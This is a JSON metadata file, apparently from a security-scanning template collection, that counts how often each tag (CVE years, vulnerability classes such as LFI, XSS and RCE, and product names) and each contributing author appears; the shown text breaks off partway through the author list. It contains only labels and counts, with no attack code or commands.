-{"tags":[{"name":"cve","count":818},{"name":"lfi","count":330},{"name":"panel","count":259},{"name":"xss","count":256},{"name":"wordpress","count":245},{"name":"exposure","count":239},{"name":"rce","count":204},{"name":"tech","count":193},{"name":"wp-plugin","count":170},{"name":"cve2020","count":164},{"name":"cve2021","count":151},{"name":"joomla","count":128},{"name":"cve2010","count":109},{"name":"cve2019","count":97},{"name":"config","count":95},{"name":"cve2018","count":87},{"name":"apache","count":73},{"name":"takeover","count":69},{"name":"iot","count":68},{"name":"token","count":67},{"name":"default-login","count":66},{"name":"token-spray","count":63},{"name":"oob","count":59},{"name":"cve2017","count":50},{"name":"file","count":49},{"name":"unauth","count":47},{"name":"network","count":43},{"name":"sqli","count":40},{"name":"ssrf","count":40},{"name":"cve2016","count":37},{"name":"redirect","count":37},{"name":"","count":37},{"name":"oracle","count":36},{"name":"logs","count":30},{"name":"google","count":29},{"name":"jira","count":28},{"name":"atlassian","count":27},{"name":"listing","count":27},{"name":"cve2014","count":27},{"name":"cve2015","count":26},{"name":"generic","count":24},{"name":"misc","count":23},{"name":"disclosure","count":23},{"name":"auth-bypass","count":23},{"name":"cisco","count":22},{"name":"router","count":21},{"name":"misconfig","count":20},{"name":"aem","count":19},{"name":"debug","count":18},{"name":"cve2012","count":18},{"name":"sap","count":18},{"name":"springboot","count":18},{"name":"php","count":16},{"name":"cve2011","count":15},{"name":"aws","count":14},{"name":"cve2009","count":14},{"name":"weblogic","count":14},{"name":"struts","count":14},{"name":"fuzz","count":14},{"name":"login","count":14},{"name":"zoho","count":13},{"name":"adobe","count":13},{"name":"dns","count":13},{"name":"android","count":13},{"name":"devops","count":13},{"name":"manageengine","count":12},{"name":"jenkins","count":12},{"name":"dlink","count":12},{"name":"wp-theme","count":11},{"name":"cve2013","count":11},{"name":"dell","count":10},{"name":"intrusive","count":10},{"name":"xxe","count":10},{"name":"vmware","count":9},{"name":"magento","count":9},{"name":"ftp","count":9},{"name":"ruijie","count":8},{"name":"gitlab","count":8},{"name":"backup","count":8},{"name":"airflow","count":8},{"name":"ibm","count":8},{"name":"cnvd","count":8},{"name":"nginx","count":8},{"name":"microsoft","count":8},{"name":"cve2008","count":8},{"name":"scada","count":8},{"name":"rails","count":8},{"name":"confluence","count":7},{"name":"files","count":7},{"name":"cms","count":7},{"name":"kubernetes","count":7},{"name":"hp","count":7},{"name":"coldfusion","count":7},{"name":"netgear","count":7},{"name":"rconfig","count":6},{"name":"solr","count":6},{"name":"jetty","count":6},{"name":"docker","count":6},{"name":"api","count":6},{"name":"django","count":6},{"name":"fileupload","count":6},{"name":"citrix","count":6},{"name":"camera","count":6},{"name":"nodejs","count":6},{"name":"laravel","count":6},{"name":"lucee","count":6},{"name":"windows","count":5},{"name":"ssti","count":5},{"name":"deserialization","count":5},{"name":"phpmyadmin","count":5},{"name":"tomcat","count":5},{"name":"java","count":5},{"name":"drupal","count":5},{"name":"jolokia","count":5},{"name":"crlf","count":5},{"name":"circarlife","count":5},{"name":"dedecms","count":5},{"name":"iis","count":5},{"name":"printer","count":5},{"name":"headless","count":5},{"name":"magmi","count":4},{"name":"exchange","count":4},{"name":"hongdian","count":4},{"name":"strapi","count":4},{"name":"asp","count":4},{"name":"amazon","count":4},{"name":"git","count":4},{"name":"artifactory","count":4},{"name":"firmware","count":4},{"name":"webserver","count":4},{"name":"symantec","count":4},{"name":"symfony","count":4},{"name":"rfi","count":4},{"name":"thinkphp","count":4},{"name":"firebase","count":4},{"name":"thinkcmf","count":4},{"name":"maps","count":4},{"name":"traversal","count":4},{"name":"slack","count":4},{"name":"buffalo","count":4},{"name":"grafana","count":4},{"name":"zabbix","count":4},{"name":"vpn","count":4},{"name":"samsung","count":4},{"name":"fatpipe","count":4},{"name":"glpi","count":4},{"name":"resin","count":4},{"name":"zimbra","count":4},{"name":"proxy","count":4},{"name":"wso2","count":4},{"name":"moodle","count":4},{"name":"npm","count":4},{"name":"elastic","count":4},{"name":"solarwinds","count":4},{"name":"cve2007","count":3},{"name":"vbulletin","count":3},{"name":"github","count":3},{"name":"bitrix","count":3},{"name":"kevinlab","count":3},{"name":"ofbiz","count":3},{"name":"lfr","count":3},{"name":"jellyfin","count":3},{"name":"r-seenet","count":3},{"name":"smtp","count":3},{"name":"hoteldruid","count":3},{"name":"openssh","count":3},{"name":"itop","count":3},{"name":"kibana","count":3},{"name":"microstrategy","count":3},{"name":"linkerd","count":3},{"name":"jeesns","count":3},{"name":"fanruan","count":3},{"name":"fpd","count":3},{"name":"nosqli","count":3},{"name":"druid","count":3},{"name":"ebs","count":3},{"name":"search","count":3},{"name":"node","count":3},{"name":"targa","count":3},{"name":"nacos","count":3},{"name":"zhiyuan","count":3},{"name":"httpd","count":3},{"name":"cacti","count":3},{"name":"telerik","count":3},{"name":"backdoor","count":3},{"name":"azure","count":3},{"name":"mongodb","count":3},{"name":"nexus","count":3},{"name":"log","count":3},{"name":"caucho","count":3},{"name":"openam","count":3},{"name":"prometheus","count":3},{"name":"bigip","count":3},{"name":"kafka","count":3},{"name":"oa","count":3},{"name":"tikiwiki","count":3},{"name":"injection","count":3},{"name":"ssh","count":3},{"name":"terramaster","count":3},{"name":"mail","count":3},{"name":"cves","count":3},{"name":"opensis","count":3},{"name":"springcloud","count":3},{"name":"grav","count":2},{"name":"activemq","count":2},{"name":"maian","count":2},{"name":"shellshock","count":2},{"name":"glassfish","count":2},{"name":"voipmonitor","count":2},{"name":"commax","count":2},{"name":"text","count":2},{"name":"netsweeper","count":2},{"name":"totemomail","count":2},{"name":"aviatrix","count":2},{"name":"kentico","count":2},{"name":"frp","count":2},{"name":"ilo","count":2},{"name":"leak","count":2},{"name":"chamilo","count":2},{"name":"plesk","count":2},{"name":"mailchimp","count":2},{"name":"tidb","count":2},{"name":"wuzhicms","count":2},{"name":"openfire","count":2},{"name":"nextjs","count":2},{"name":"bruteforce","count":2},{"name":"payara","count":2},{"name":"oauth","count":2},{"name":"bucket","count":2},{"name":"globalprotect","count":2},{"name":"embed","count":2},{"name":"vrealize","count":2},{"name":"service","count":2},{"name":"akkadian","count":2},{"name":"ecoa","count":2},{"name":"odoo","count":2},{"name":"wordfence","count":2},{"name":"couchdb","count":2},{"name":"bitly","count":2},{"name":"sonicwall","count":2},{"name":"heroku","count":2},{"name":"liferay","count":2},{"name":"flir","count":2},{"name":"sonarqube","count":2},{"name":"jsf","count":2},{"name":"chyrp","count":2},{"name":"minio","count":2},{"name":"ec2","count":2},{"name":"waf","count":2},{"name":"qihang","count":2},{"name":"harbor","count":2},{"name":"showdoc","count":2},{"name":"ecology","count":2},{"name":"natshell","count":2},{"name":"justwriting","count":2},{"name":"upload","count":2},{"name":"jboss","count":2},{"name":"prtg","count":2},{"name":"nagios","count":2},{"name":"icewarp","count":2},{"name":"webcam","count":2},{"name":"sitecore","count":2},{"name":"nextcloud","count":2},{"name":"akamai","count":2},{"name":"spark","count":2},{"name":"smb","count":2},{"name":"splunk","count":2},{"name":"geowebserver","count":2},{"name":"bypass","count":2},{"name":"saltstack","count":2},{"name":"hashicorp","count":2},{"name":"guacamole","count":2},{"name":"status","count":2},{"name":"netis","count":2},{"name":"kong","count":2},{"name":"qcubed","count":2},{"name":"prestashop","count":2},{"name":"enumeration","count":2},{"name":"linux","count":2},{"name":"idrac","count":2},{"name":"dolibarr","count":2},{"name":"aruba","count":2},{"name":"storage","count":2},{"name":"rockmongo","count":2},{"name":"yii","count":2},{"name":"hostheader-injection","count":2},{"name":"openvpn","count":2},{"name":"axis","count":2},{"name":"db","count":2},{"name":"seeyon","count":2},{"name":"ucmdb","count":2},{"name":"trixbox","count":2},{"name":"cache","count":2},{"name":"hjtcloud","count":2},{"name":"fortios","count":2},{"name":"xxljob","count":2},{"name":"horde","count":2},{"name":"jeedom","count":2},{"name":"backups","count":2},{"name":"avantfax","count":2},{"name":"vcenter","count":2},{"name":"axis2","count":2},{"name":"emerge","count":2},{"name":"cve2005","count":2},{"name":"hasura","count":2},{"name":"hpe","count":2},{"name":"paloalto","count":2},{"name":"pega","count":2},{"name":"huawei","count":2},{"name":"middleware","count":2},{"name":"mida","count":2},{"name":"mcafee","count":2},{"name":"phpcollab","count":2},{"name":"s3","count":2},{"name":"keycloak","count":2},{"name":"getsimple","count":2},{"name":"places","count":2},{"name":"chiyu","count":2},{"name":"igs","count":2},{"name":"rstudio","count":2},{"name":"yapi","count":2},{"name":"favicon","count":2},{"name":"dos","count":2},{"name":"sharepoint","count":2},{"name":"adminer","count":2},{"name":"timeclock","count":1},{"name":"rubedo","count":1},{"name":"mobileiron","count":1},{"name":"k8","count":1},{"name":"bullwark","count":1},{"name":"maxsite","count":1},{"name":"elascticsearch","count":1},{"name":"wavlink","count":1},{"name":"timezone","count":1},{"name":"k8s","count":1},{"name":"jaspersoft","count":1},{"name":"centos","count":1},{"name":"bigbluebutton","count":1},{"name":"directions","count":1},{"name":"streetview","count":1},{"name":"haproxy","count":1},{"name":"redmine","count":1},{"name":"htmli","count":1},{"name":"sprintful","count":1},{"name":"redhat","count":1},{"name":"tapestry","count":1},{"name":"influxdb","count":1},{"name":"nsasg","count":1},{"name":"finereport","count":1},{"name":"octoprint","count":1},{"name":"beanshell","count":1},{"name":"ulterius","count":1},{"name":"discord","count":1},{"name":"xml","count":1},{"name":"solman","count":1},{"name":"tileserver","count":1},{"name":"interlib","count":1},{"name":"sar2html","count":1},{"name":"sidekiq","count":1},{"name":"owasp","count":1},{"name":"dotnet","count":1},{"name":"zenario","count":1},{"name":"biometrics","count":1},{"name":"gitea","count":1},{"name":"linkedin","count":1},{"name":"tensorboard","count":1},{"name":"trane","count":1},{"name":"digitalocean","count":1},{"name":"daybyday","count":1},{"name":"embedthis","count":1},{"name":"landray","count":1},{"name":"eyou","count":1},{"name":"cse","count":1},{"name":"werkzeug","count":1},{"name":"setup","count":1},{"name":"sgp","count":1},{"name":"whm","count":1},{"name":"webadmin","count":1},{"name":"upnp","count":1},{"name":"avtech","count":1},{"name":"dbeaver","count":1},{"name":"arl","count":1},{"name":"visionhub","count":1},{"name":"esmtp","count":1},{"name":"tjws","count":1},{"name":"glowroot","count":1},{"name":"apiman","count":1},{"name":"elasticsearch","count":1},{"name":"javascript","count":1},{"name":"zarafa","count":1},{"name":"weather","count":1},{"name":"wifisky","count":1},{"name":"mediumish","count":1},{"name":"openx","count":1},{"name":"gateone","count":1},{"name":"pyramid","count":1},{"name":"shopizer","count":1},{"name":"couchbase","count":1},{"name":"portainer","count":1},{"name":"vidyo","count":1},{"name":"plone","count":1},{"name":"clockwork","count":1},{"name":"subrion","count":1},{"name":"openemr","count":1},{"name":"hiawatha","count":1},{"name":"phpshowtime","count":1},{"name":"acontent","count":1},{"name":"gridx","count":1},{"name":"alibaba","count":1},{"name":"openstack","count":1},{"name":"rujjie","count":1},{"name":"scs","count":1},{"name":"octobercms","count":1},{"name":"graphql","count":1},{"name":"ssltls","count":1},{"name":"saltapi","count":1},{"name":"szhe","count":1},{"name":"imap","count":1},{"name":"zookeeper","count":1},{"name":"myvuehelp","count":1},{"name":"episerver","count":1},{"name":"emc","count":1},{"name":"sendgrid","count":1},{"name":"ioncube","count":1},{"name":"okiko","count":1},{"name":"qsan","count":1},{"name":"logontracer","count":1},{"name":"duomicms","count":1},{"name":"expn","count":1},{"name":"roads","count":1},{"name":"pagerduty","count":1},{"name":"visualtools","count":1},{"name":"fuelcms","count":1},{"name":"memcached","count":1},{"name":"yzmcms","count":1},{"name":"gitlist","count":1},{"name":"zyxel","count":1},{"name":"lotus","count":1},{"name":"csod","count":1},{"name":"photo","count":1},{"name":"ipstack","count":1},{"name":"tika","count":1},{"name":"graphite","count":1},{"name":"apos","count":1},{"name":"tpshop","count":1},{"name":"gilacms","count":1},{"name":"webui","count":1},{"name":"ems","count":1},{"name":"bedita","count":1},{"name":"xampp","count":1},{"name":"sureline","count":1},{"name":"kyan","count":1},{"name":"comodo","count":1},{"name":"tor","count":1},{"name":"square","count":1},{"name":"karel","count":1},{"name":"redwood","count":1},{"name":"sqlite","count":1},{"name":"lutron","count":1},{"name":"nuuo","count":1},{"name":"sangfor","count":1},{"name":"spotify","count":1},{"name":"lanproxy","count":1},{"name":"jmx","count":1},{"name":"addpac","count":1},{"name":"flink","count":1},{"name":"ecom","count":1},{"name":"oscommerce","count":1},{"name":"geddy","count":1},{"name":"default","count":1},{"name":"blind","count":1},{"name":"lancom","count":1},{"name":"weiphp","count":1},{"name":"place","count":1},{"name":"checkpoint","count":1},{"name":"monitorix","count":1},{"name":"motorola","count":1},{"name":"jsp","count":1},{"name":"phpwiki","count":1},{"name":"dompdf","count":1},{"name":"labtech","count":1},{"name":"gsoap","count":1},{"name":"shiro","count":1},{"name":"playable","count":1},{"name":"rmc","count":1},{"name":"details","count":1},{"name":"panabit","count":1},{"name":"eyelock","count":1},{"name":"email","count":1},{"name":"tongda","count":1},{"name":"dom","count":1},{"name":"oneblog","count":1},{"name":"gotmls","count":1},{"name":"shopware","count":1},{"name":"ganglia","count":1},{"name":"extractor","count":1},{"name":"axiom","count":1},{"name":"springframework","count":1},{"name":"mirai","count":1},{"name":"concrete","count":1},{"name":"circle","count":1},{"name":"fedora","count":1},{"name":"vsphere","count":1},{"name":"ghost","count":1},{"name":"listserv","count":1},{"name":"chevereto","count":1},{"name":"gstorage","count":1},{"name":"mariadb","count":1},{"name":"realteo","count":1},{"name":"linksys","count":1},{"name":"newrelic","count":1},{"name":"mpsec","count":1},{"name":"tieline","count":1},{"name":"cloudflare","count":1},{"name":"idemia","count":1},{"name":"webmodule-ee","count":1},{"name":"sentry","count":1},{"name":"acme","count":1},{"name":"webftp","count":1},{"name":"phpunit","count":1},{"name":"clave","count":1},{"name":"twitter-server","count":1},{"name":"iptime","count":1},{"name":"phpfastcache","count":1},{"name":"dropbox","count":1},{"name":"zms","count":1},{"name":"nordex","count":1},{"name":"shoppable","count":1},{"name":"dvr","count":1},{"name":"jquery","count":1},{"name":"loqate","count":1},{"name":"moin","count":1},{"name":"contentkeeper","count":1},{"name":"shoretel","count":1},{"name":"azkaban","count":1},{"name":"st","count":1},{"name":"opentsdb","count":1},{"name":"livezilla","count":1},{"name":"cscart","count":1},{"name":"crm","count":1},{"name":"locations","count":1},{"name":"traefik","count":1},{"name":"pulsesecure","count":1},{"name":"ricoh","count":1},{"name":"rocketchat","count":1},{"name":"xdcms","count":1},{"name":"announcekit","count":1},{"name":"mantisbt","count":1},{"name":"jitsi","count":1},{"name":"sarg","count":1},{"name":"pivotaltracker","count":1},{"name":"youtube","count":1},{"name":"diris","count":1},{"name":"netgenie","count":1},{"name":"deviantart","count":1},{"name":"calendarix","count":1},{"name":"clockwatch","count":1},{"name":"floc","count":1},{"name":"find","count":1},{"name":"asana","count":1},{"name":"landrayoa","count":1},{"name":"geutebruck","count":1},{"name":"autocomplete","count":1},{"name":"ueditor","count":1},{"name":"rabbitmq","count":1},{"name":"tensorflow","count":1},{"name":"doh","count":1},{"name":"stem","count":1},{"name":"opensns","count":1},{"name":"nifi","count":1},{"name":"uwsgi","count":1},{"name":"auth","count":1},{"name":"geolocation","count":1},{"name":" default-login","count":1},{"name":"jnoj","count":1},{"name":"bookstack","count":1},{"name":"jfrog","count":1},{"name":"plc","count":1},{"name":"vscode","count":1},{"name":"csrfguard","count":1},{"name":"cyberoam","count":1},{"name":"nedi","count":1},{"name":"yealink","count":1},{"name":"centreon","count":1},{"name":"fortinet","count":1},{"name":"hiboss","count":1},{"name":"sourcebans","count":1},{"name":"secmail","count":1},{"name":"fortilogger","count":1},{"name":"feifeicms","count":1},{"name":"mongoshake","count":1},{"name":"smartsense","count":1},{"name":"robomongo","count":1},{"name":"tamronos","count":1},{"name":"achecker","count":1},{"name":"mantis","count":1},{"name":"elevation","count":1},{"name":"xiuno","count":1},{"name":"sceditor","count":1},{"name":"seacms","count":1},{"name":"ewebs","count":1},{"name":"spf","count":1},{"name":"electron","count":1},{"name":"yachtcontrol","count":1},{"name":"circontrorl","count":1},{"name":"pihole","count":1},{"name":"plastic","count":1},{"name":"fcm","count":1},{"name":"mrtg","count":1},{"name":"spring","count":1},{"name":"postmessage","count":1},{"name":"circleci","count":1},{"name":"node-red-dashboard","count":1},{"name":"ssl","count":1},{"name":"moinmoin","count":1},{"name":"krweb","count":1},{"name":"beanstalk","count":1},{"name":"sage","count":1},{"name":"nweb2fax","count":1},{"name":"artica","count":1},{"name":"wazuh","count":1},{"name":"metabase","count":1},{"name":"testrail","count":1},{"name":"iceflow","count":1},{"name":"varnish","count":1},{"name":"cors","count":1},{"name":"ambari","count":1},{"name":"pacsone","count":1},{"name":"javamelody","count":1},{"name":"jumpcloud","count":1},{"name":"keenetic","count":1},{"name":"stripe","count":1},{"name":"pgadmin","count":1},{"name":"phpfusion","count":1},{"name":"circontrol","count":1},{"name":"pippoint","count":1},{"name":"cobub","count":1},{"name":"burp","count":1},{"name":"lotuscms","count":1},{"name":"optiLink","count":1},{"name":"aspnuke","count":1},{"name":"pcoip","count":1},{"name":"gogs","count":1},{"name":"gloo","count":1},{"name":"ruby","count":1},{"name":"argussurveillance","count":1},{"name":"buildkite","count":1},{"name":"elfinder","count":1},{"name":"cerebro","count":1},{"name":"blue-ocean","count":1},{"name":"acexy","count":1},{"name":"wildfly","count":1},{"name":"flexbe","count":1},{"name":"gurock","count":1},{"name":"buttercms","count":1},{"name":"minimouse","count":1},{"name":"natemail","count":1},{"name":"dnssec","count":1},{"name":"weglot","count":1},{"name":"cockpit","count":1},{"name":"accela","count":1},{"name":"phalcon","count":1},{"name":"rockethchat","count":1},{"name":"camunda","count":1},{"name":"mysql","count":1},{"name":"exposures","count":1},{"name":"bingmaps","count":1},{"name":"trilithic","count":1},{"name":"maccmsv10","count":1},{"name":"faraday","count":1},{"name":"glances","count":1},{"name":"placeos","count":1},{"name":"mara","count":1},{"name":"dotnetnuke","count":1},{"name":"wondercms","count":1},{"name":"spip","count":1},{"name":"klog","count":1},{"name":"mdb","count":1},{"name":"redcap","count":1},{"name":"nc2","count":1},{"name":"magicflow","count":1},{"name":"eprints","count":1},{"name":"fortiweb","count":1},{"name":"majordomo2","count":1},{"name":"qdpm","count":1},{"name":"woocommerce","count":1},{"name":"gespage","count":1},{"name":"b2evolution","count":1},{"name":"tenda","count":1},{"name":"timesheet","count":1},{"name":"cherokee","count":1},{"name":"proftpd","count":1},{"name":"nette","count":1},{"name":"clink-office","count":1},{"name":"speed","count":1},{"name":"simplecrm","count":1},{"name":"cloudinary","count":1},{"name":"jenkin","count":1},{"name":"opencast","count":1},{"name":"servicedesk","count":1},{"name":"cloudron","count":1},{"name":"zzzcms","count":1},{"name":"aura","count":1},{"name":"viewpoint","count":1},{"name":"websvn","count":1},{"name":"terraform","count":1},{"name":"zm","count":1},{"name":"wiki","count":1},{"name":"raspap","count":1},{"name":"panos","count":1},{"name":"nerdgraph","count":1},{"name":"ntopng","count":1},{"name":"zend","count":1},{"name":"novnc","count":1},{"name":"kindeditor","count":1},{"name":"woocomernce","count":1},{"name":"ilo4","count":1},{"name":"lokalise","count":1},{"name":"chinaunicom","count":1},{"name":"clusterengine","count":1},{"name":"iterable","count":1},{"name":"bash","count":1},{"name":"meraki","count":1},{"name":"spectracom","count":1},{"name":"package","count":1},{"name":"avalanche","count":1},{"name":"swagger","count":1},{"name":"limit","count":1},{"name":"route","count":1},{"name":"codemeter","count":1},{"name":"luftguitar","count":1},{"name":"nexusdb","count":1},{"name":"scimono","count":1},{"name":"pendo","count":1},{"name":"bolt","count":1},{"name":"netrc","count":1},{"name":"opensmtpd","count":1},{"name":"perl","count":1},{"name":"tectuus","count":1},{"name":"fastapi","count":1},{"name":"travis","count":1},{"name":"etouch","count":1},{"name":"oidc","count":1},{"name":"cves2001","count":1},{"name":"wmt","count":1},{"name":"dotclear","count":1},{"name":"hubspot","count":1},{"name":"wakatime","count":1},{"name":"starttls","count":1},{"name":"kafdrop","count":1},{"name":"froxlor","count":1},{"name":"fortigates","count":1},{"name":"emby","count":1},{"name":"lansweeper","count":1},{"name":"ognl","count":1},{"name":"qvisdvr","count":1},{"name":"solarlog","count":1},{"name":"h3c-imc","count":1},{"name":"mongo","count":1},{"name":"thinkadmin","count":1},{"name":"netmask","count":1},{"name":"instagram","count":1},{"name":"discourse","count":1},{"name":"graph","count":1},{"name":"grails","count":1},{"name":"openweather","count":1},{"name":"netdata","count":1},{"name":"ruckus","count":1},{"name":"domxss","count":1},{"name":"processmaker","count":1},{"name":"matrix","count":1},{"name":"javafaces","count":1},{"name":"ns","count":1},{"name":"xvr","count":1},{"name":"pmb","count":1},{"name":"dvwa","count":1},{"name":"etherpad","count":1},{"name":"cofax","count":1},{"name":"exacqvision","count":1},{"name":"jeewms","count":1},{"name":"smi","count":1},{"name":"craftcms","count":1},{"name":"mautic","count":1},{"name":"svnserve","count":1},{"name":"miscrsoft","count":1},{"name":"lg-nas","count":1},{"name":"rmi","count":1},{"name":"resourcespace","count":1},{"name":"hadoop","count":1},{"name":"spidercontrol","count":1},{"name":"fiori","count":1},{"name":"openrestry","count":1},{"name":"sophos","count":1},{"name":"alertmanager","count":1},{"name":"razor","count":1},{"name":"darkstat","count":1},{"name":"sql","count":1},{"name":"cocoon","count":1},{"name":"cloud","count":1},{"name":"cgi","count":1},{"name":"commscope","count":1},{"name":"fortigate","count":1},{"name":"mapbox","count":1},{"name":"geocode","count":1},{"name":"distance","count":1},{"name":"anchorcms","count":1},{"name":"zte","count":1},{"name":"appweb","count":1},{"name":"cve2006","count":1},{"name":"database","count":1},{"name":"sonarcloud","count":1},{"name":"tcexam","count":1},{"name":"fastcgi","count":1},{"name":"bazarr","count":1},{"name":"skywalking","count":1},{"name":"nuxeo","count":1},{"name":"csrf","count":1},{"name":"frontpage","count":1},{"name":"xunchi","count":1},{"name":"codeigniter","count":1},{"name":"powercreator","count":1},{"name":"panasonic","count":1},{"name":"wamp","count":1},{"name":"twitter","count":1},{"name":"nps","count":1},{"name":"viewlinc","count":1},{"name":"opm","count":1},{"name":"erp-nc","count":1},{"name":"actuator","count":1},{"name":"key","count":1},{"name":"salesforce","count":1},{"name":"totaljs","count":1},{"name":"zmanda","count":1},{"name":"rhymix","count":1},{"name":"jenzabar","count":1},{"name":"omi","count":1},{"name":"asus","count":1},{"name":"metinfo","count":1},{"name":"empirecms","count":1},{"name":"remkon","count":1},{"name":"servicenow","count":1},{"name":"drone","count":1},{"name":"calendly","count":1},{"name":"shopxo","count":1},{"name":"rdp","count":1},{"name":"wooyun","count":1},{"name":"graylog","count":1},{"name":"goahead","count":1},{"name":"lighttpd","count":1},{"name":"soar","count":1},{"name":"tugboat","count":1},{"name":"gunicorn","count":1},{"name":"manager","count":1},{"name":"turbocrm","count":1},{"name":"blackboard","count":1},{"name":"myucms","count":1},{"name":"monitorr","count":1},{"name":"triconsole","count":1},{"name":"phpinfo","count":1},{"name":"mailgun","count":1},{"name":"hortonworks","count":1},{"name":"api-manager","count":1},{"name":"kubeflow","count":1},{"name":"xmlchart","count":1},{"name":"nimble","count":1},{"name":"vnc","count":1},{"name":"office365","count":1},{"name":"huijietong","count":1},{"name":"smartblog","count":1},{"name":"exponentcms","count":1},{"name":"webmin","count":1},{"name":"socomec","count":1},{"name":"svn","count":1},{"name":"vsftpd","count":1},{"name":"pagespeed","count":1},{"name":"synnefo","count":1},{"name":"expose","count":1},{"name":"nearby","count":1},{"name":"openerp","count":1},{"name":"rsyncd","count":1},{"name":"bing","count":1},{"name":"okta","count":1},{"name":"zeroshell","count":1},{"name":"wing-ftp","count":1},{"name":"websphere","count":1},{"name":"sco","count":1},{"name":"clickhouse","count":1},{"name":"visualstudio","count":1},{"name":"zcms","count":1},{"name":"kerbynet","count":1},{"name":"olivetti","count":1},{"name":"eg","count":1},{"name":"alerta","count":1},{"name":"expressjs","count":1},{"name":"primetek","count":1},{"name":"basic-auth","count":1},{"name":"plugin","count":1},{"name":"parentlink","count":1},{"name":"selea","count":1},{"name":"tracer","count":1},{"name":"nomad","count":1},{"name":"wavemaker","count":1},{"name":"messaging","count":1},{"name":"owa","count":1},{"name":"74cms","count":1},{"name":"postgres","count":1},{"name":"adb","count":1},{"name":"postmark","count":1},{"name":"redis","count":1},{"name":"tinypng","count":1}],"authors":[{"name":"daffainfo","count":285},{"name":"pikpikcu","count":279},{"name":"dhiyaneshdk","count":268},{"name":"pdteam","count":201},{"name":"geeknik","count":159},{"name":"dwisiswant0","count":131},{"name":"gy741","count":81},{"name":"pussycat0x","count":72},{"name":"princechaddha","count":64},{"name":"zzeitlin","count":63},{"name":"madrobot","count":63},{"name":"0x_akoko","count":46},{"name":"gaurang","count":42},{"name":"philippedelteil","count":27},{"name":"ice3man","count":26},{"name":"organiccrap","count":24},{"name":"sheikhrishad","count":15},{"name":"pr3r00t","count":15},{"name":"milo2012","count":14},{"name":"techbrunchfr","count":13},{"name":"suman_kar","count":12},{"name":"cyllective","count":11},{"name":"r3dg33k","count":11},{"name":"wdahlenb","count":10},{"name":"righettod","count":10},{"name":"nadino","count":10},{"name":"random_robbie","count":10},{"name":"melbadry9","count":10},{"name":"hackergautam","count":9},{"name":"aashiq","count":8},{"name":"that_juan_","count":8},{"name":"iamthefrogy","count":8},{"name":"meme-lord","count":7},{"name":"oppsec","count":7},{"name":"kophjager007","count":7},{"name":"0x240x23elu","count":7},{"name":"emadshanab","count":7},{"name":"harshbothra_","count":7},{"name":"dr_set","count":7},{"name":"dogasantos","count":7},{"name":"randomstr1ng","count":7},{"name":"techryptic (@tech)","count":7},{"name":"pentest_swissky","count":6},{"name":"logicalhunter","count":6},{"name":"puzzlepeaches","count":6},{"name":"__fazal","count":6},{"name":"caspergn","count":6},{"name":"iamnoooob","count":5},{"name":"panch0r3d","count":5},{"name":"rootxharsh","count":5},{"name":"joanbono","count":5},{"name":"johnk3r","count":5},{"name":"xelkomy","count":5},{"name":"lu4nx","count":5},{"name":"yanyun","count":5},{"name":"elsfa7110","count":5},{"name":"ganofins","count":5},{"name":"incogbyte","count":4},{"name":"e_schultze_","count":4},{"name":"github.com/its0x08","count":4},{"name":"nodauf","count":4},{"name":"sullo","count":3},{"name":"f1tz","count":3},{"name":"mavericknerd","count":3},{"name":"0w4ys","count":3},{"name":"yash anand @yashanand155","count":3},{"name":"vsh00t","count":3},{"name":"tess","count":3},{"name":"unstabl3","count":3},{"name":"fyoorer","count":3},{"name":"sushantkamble","count":3},{"name":"skeltavik","count":3},{"name":"_generic_human_","count":3},{"name":"thomas_from_offensity","count":3},{"name":"dudez","count":3},{"name":"jarijaas","count":3},{"name":"shifacyclewala","count":3},{"name":"idealphase","count":3},{"name":"binaryfigments","count":3},{"name":"z3bd","count":3},{"name":"impramodsargar","count":3},{"name":"shine","count":3},{"name":"emenalf","count":3},{"name":"0xelkomy","count":2},{"name":"swissky","count":2},{"name":"foulenzer","count":2},{"name":"johnjhacking","count":2},{"name":"sy3omda","count":2},{"name":"huowuzhao","count":2},{"name":"nkxxkn","count":2},{"name":"joeldeleep","count":2},{"name":"fabaff","count":2},{"name":"socketz","count":2},{"name":"0xprial","count":2},{"name":"ree4pwn","count":2},{"name":"0xrudra","count":2},{"name":"pxmme1337","count":2},{"name":"gevakun","count":2},{"name":"g4l1t0","count":2},{"name":"davidmckennirey","count":2},{"name":"arcc","count":2},{"name":"manas_harsh","count":2},{"name":"hahwul","count":2},{"name":"udit_thakkur","count":2},{"name":"r12w4n","count":2},{"name":"alifathi-h1","count":2},{"name":"parth","count":2},{"name":"0xcrypto","count":2},{"name":"mahendra purbia (mah3sec_)","count":2},{"name":"hetroublemakr","count":2},{"name":"dheerajmadhukar","count":2},{"name":"bsysop","count":2},{"name":"me9187","count":2},{"name":"r3naissance","count":2},{"name":"bernardofsr","count":2},{"name":"kiblyn11","count":2},{"name":"0xsapra","count":2},{"name":"zomsop82","count":2},{"name":"lotusdll","count":2},{"name":"gal nagli","count":2},{"name":"koti2","count":2},{"name":"0xsmiley","count":2},{"name":"convisoappsec","count":2},{"name":"random-robbie","count":2},{"name":"x1m_martijn","count":2},{"name":"randomrobbie","count":2},{"name":"whoever","count":2},{"name":"bing0o","count":2},{"name":"afaq","count":2},{"name":"ehsahil","count":2},{"name":"moritz nentwig","count":2},{"name":"mohammedsaneem","count":2},{"name":"bp0lr","count":2},{"name":"cocxanh","count":2},{"name":"w4cky_","count":2},{"name":"amsda","count":2},{"name":"vavkamil","count":2},{"name":"elouhi","count":1},{"name":"yashanand155","count":1},{"name":"hakluke","count":1},{"name":"sickwell","count":1},{"name":"ipanda","count":1},{"name":"soyelmago","count":1},{"name":"mass0ma","count":1},{"name":"elmahdi","count":1},{"name":"udyz","count":1},{"name":"jteles","count":1},{"name":"sshell","count":1},{"name":"pudsec","count":1},{"name":"furkansenan","count":1},{"name":"ilovebinbash","count":1},{"name":"streetofhackerr007 (rohit soni)","count":1},{"name":"0ut0fb4nd","count":1},{"name":"ringo","count":1},{"name":"52971","count":1},{"name":"lark lab","count":1},{"name":"nerrorsec","count":1},{"name":"infosecsanyam","count":1},{"name":"daviey","count":1},{"name":"xstp","count":1},{"name":"nvn1729","count":1},{"name":"shifacyclewla","count":1},{"name":"kareemse1im","count":1},{"name":"elder tao","count":1},{"name":"naglinagli","count":1},{"name":"undefl0w","count":1},{"name":"petruknisme","count":1},{"name":"jrolf","count":1},{"name":"pratik khalane","count":1},{"name":"kurohost","count":1},{"name":"sec_hawk","count":1},{"name":"j3ssie/geraldino2","count":1},{"name":"taielab","count":1},{"name":"mhdsamx","count":1},{"name":"apt-mirror","count":1},{"name":"s1r1u5_","count":1},{"name":"aresx","count":1},{"name":"0xrod","count":1},{"name":"patralos","count":1},{"name":"kabirsuda","count":1},{"name":"adrianmf","count":1},{"name":"toufik 